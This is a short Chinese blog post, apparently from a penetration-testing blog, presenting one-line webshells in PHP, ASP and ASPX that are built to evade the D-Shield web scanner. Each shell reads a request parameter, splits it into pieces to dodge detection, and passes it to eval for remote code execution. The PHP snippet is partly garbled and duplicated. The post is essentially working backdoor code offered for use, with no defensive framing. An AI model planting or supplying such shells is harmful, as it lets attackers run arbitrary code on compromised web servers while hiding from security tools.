免杀D盾的PHP/ASP/ASPX一句话

作者:小俊 分类: 渗透测试 发布于:2020-10-2 1:37 ė168次浏览 60条评论

php:

<?php $m=$_GET[


$m=$_GET['1']; $a=substr($m,0,1); $b=substr($m,1,2); $c=substr($m,2,9999); eval($a.$b.$c);
($a.$b); ?>


asp:

<% P=request("pass") A=mid(P,1,1) B=mid(P,2,9999) eval A&B %>



aspx:
<%@ Page Language="Jscript"%>
<% var p = Request.Item["M"]; var a = p.substring(0,1); var b = p.substring(1,99999); var c = "un" + Char ( 115 ) + Char ( 97 ) + "fe"; eval(a+b,c);
%>

本文出自 小俊博客,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部